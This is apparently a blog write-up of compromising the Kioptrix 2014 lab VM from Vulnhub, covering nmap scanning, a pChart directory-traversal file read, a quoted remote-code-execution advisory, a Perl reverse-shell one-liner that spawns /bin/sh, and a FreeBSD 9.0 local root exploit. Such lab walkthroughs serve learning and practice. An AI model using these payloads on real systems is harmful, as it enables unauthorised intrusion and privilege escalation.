Today was one of those days where I was supposed to start doing some school work. I am just not “feeling” natural sciences, and the grass is too wet to mow. That said, I figured it would be a good time to try out the new Kioptrix. Kioptrix is a boot 2 root that targets beginning hackers. I picked up my copy from Vulnhub (great community active on freenode).

I imported it into parallels, and all was pretty straight forward, if you use virtual box or workstation 9 or below, you will need to follow the additional instructions.

Using netdiscover, its pretty clear which ip address Is kioptrix.


I go ahead and run nmap on that ip address to reveal two open ports, port 80 and port 8080, based on the response it looks like port 8080 is now allowing nmap to access it.

nmap results

Lets go ahead and do some directory discovery on port 80

Looks like there isn’t much there…


Oh look at that! I should of looked at the source first, should of known….


Lets go to that address,Interesting, we see that there is in fact a web application on this server pchart2.1.3, it gives us the version.


Lets ask Google….


And in fact Google tells us that there is an exploit!

It looks as though there is a directory traversal bug, lets try it out….

[1] Directory Traversal:
The traversal is executed with the web server’s privilege and leads to
sensitive file disclosure (passwd, or similar),
access to source codes, hardcoded passwords or other high impact
consequences, depending on the web server’s configuration.
This problem may exists in the production code if the example code was
copied into the production environment.

And we append index.php?Action=View&Script=%2f..%2f..%2fetc/passwd


Looks like our LFI is working! Now what? Well… based on my experience with LFI in my OSCP and OSCE classes, traditionally we can get code execution from php code and log poisoning. Lets see what we can browse to. After gooling “freebsd apache log” and trying one of the locations I get a success with the error log :


If you look close, it will show us 404’s as well, so lets try interting a url encoded php script such as :

Url encoded as :


Our code shows up in the log, highlighted in blue. It does not execute however.

Lets try the 8080 site:

We keep getting :

[Sun Jun 01 13:54:44 2014] [error] [client] client denied by server configuration: /usr/local/www/apache22/data2/
[Sun Jun 01 13:54:44 2014] [error] [client] client denied by server configuration: /usr/local/www/apache22/data2/favicon.ico
[Sun Jun 01 13:54:44 2014] [error] [client] client denied by server configuration: /usr/local/www/apache22/data2/favicon.icoVirtual Hosts

Using the firefox addon user agent switcher, I quickly changed to Mozilla 4 and refreshed the page:


This first thing exploit-db tells us is :

The application is prone to a remote code execution vulnerability.
drawimage.php, line 63:
include (“./files/$_GET[pfilez]”);
// makes a png image
Header(“Content-type: image/png”);
if ($_GET[pdf] == “”) Imagepng($image);
if ($_GET[pdf] == “make”) Imagepng($image,”./data/pdf/$pfilef”);
if ($_GET[pdf] == “make”) exec(“convert ./data/pdf/$pfilef ./data/pdf/$pfilep”);
Exploit / Proof of Concept:
Bindshell on port 23235 using netcat:
** Exploit-DB Verified:**

Interesting, I tried the POC and it seems I get no bind shell at all. I’ve experienced this before, there are many flavors of netcat and sometimes the bind option just doesn’t work.

Same idea as before, lets abuse the php.

echo ‘‘ > cmd.php

It looks as though its working now….


Lets get something a little more substantial

Using various perl -v and python -v I found perl was installed. I used this perl one liner:

perl -e ‘use Socket;$i=”″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

By itself it doesn’t work, but url encoded, it works just fine…

got a shhell

Okay… so not we’ve got a shell.

Now lets get root.

$ uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 [email protected]:/usr/obj/usr/src/sys/GENERIC amd64

Lets again look at exploit-db and see if there is anything we can use.

Looks like there is one for freebsd 9.0, lets try it out.

Gcc is installed, so we wont need a staging OS to compile, or any other toolchains. Lets upload this compile it and see how it works.

$ gcc freebsd9.c -o freebsd
$ ls
$ chmod 777 freebsd
$ ./freebsd
[+] Start Engine…
[+] Crotz…
[+] Crotz…
[+] Crotz…
[+] Woohoo!!!
$ whoami


Sweet! All in all, it was a good day of procrastination!